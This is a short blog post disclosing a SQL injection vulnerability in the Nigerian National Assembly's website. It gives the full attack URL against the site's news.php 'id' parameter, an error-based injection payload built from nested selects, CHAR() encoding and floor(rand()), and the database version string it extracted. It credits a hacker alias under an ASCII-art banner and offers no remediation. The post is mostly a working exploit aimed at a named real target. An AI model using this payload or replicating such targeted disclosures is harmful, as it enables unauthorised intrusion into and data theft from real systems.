National Assembly Federal Republic of Nigeria SQLi Vulnerability | BOT24

National Assembly Federal Republic of Nigeria SQLi Vulnerability


                 ________________         ._________            ______________.__                  
___  ______  ___ /   _____/\   _  \   ____ |__\   _  \ ______   /  |  \______  \  |__ ___  ______  ___
\  \/  /\  \/  / \_____  \ /  /_\  \_/ ___\|  /  /_\  \\____ \ /   |  |_  /    /  |  \\  \/  /\  \/  /
 >    <  >    <  /        \\  \_/   \  \___|  \  \_/   \  |_> >    ^   / /    /|   Y  \>    <  >    <
/__/\_ \/__/\_ \/_______  / \_____  /\___  >__|\_____  /   __/\____   | /____/ |___|  /__/\_ \/__/\_ \
      \/      \/        \/        \/     \/          \/|__|        |__|             \/      \/      \/


SQL Injection
Url  http://www.nassnig.org/nass/news.php?id=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Extracted Data 5.1.56-log
Parameter Name id
Parameter Type Querystring
Attack Pattern (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

Credit:  XXS0CI0P47HXX




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Share on Google Plus

About Bradley Susser

    Blogger Comment
    Facebook Comment

0 comments :

Post a Comment